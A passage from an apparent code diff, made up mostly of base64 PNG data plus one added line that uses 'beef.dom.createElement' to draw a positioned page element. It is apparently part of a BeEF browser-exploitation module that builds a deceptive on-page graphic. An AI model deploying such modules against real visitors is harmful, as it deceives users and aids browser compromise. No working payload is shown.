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);'});
+	var elr = beef.dom.createElement('div',{'style':'width: 181px; height: 100%; padding: 0; margin: 0 40px 0 0; position: absolute; right: 0px; top: 0px; background-image: url(data:image/png;base64,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